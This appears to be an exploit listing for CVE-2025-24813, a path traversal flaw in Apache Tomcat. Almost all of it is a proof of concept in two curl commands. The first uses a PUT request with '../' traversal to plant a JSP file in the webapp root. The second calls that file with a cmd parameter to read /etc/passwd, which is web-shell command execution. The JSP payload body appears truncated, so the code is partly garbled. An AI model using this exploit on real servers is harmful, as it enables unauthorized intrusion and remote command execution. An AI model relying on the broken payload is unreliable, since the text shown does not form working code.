## https://sploitus.com/exploit?id=4B9B6977-7D7E-56D6-B8A7-1D4ED401012A
# CVE-2025-24813 - Apache Tomcat Path Equivalence Vulnerability
Apache Tomcat is vulnerable to a **Path Equivalence / Path Traversal** issue due to improper handling of `../` sequences in paths.
**CVE ID:** CVE-2025-24813
- **Severity:** Critical
**Reference link:** https://github.com/advisories/GHSA-83qj-6fr2-vhqg
---
### PoC Steps:
**1. Send a `curl` request with a PUT method:**
```bash
curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
-H "Content-Type: application/x-jsp" \
--data-raw '
"); } } %>
' -i
```

**2. Access the uploaded file directly:**
```bash
curl "http://target.com/updates.jsp?cmd=cat/etc/passwd" -i
```

---
This repository is created for educational purposes and authorized testing only.
**Unauthorized use against systems without explicit permission is illegal.**
---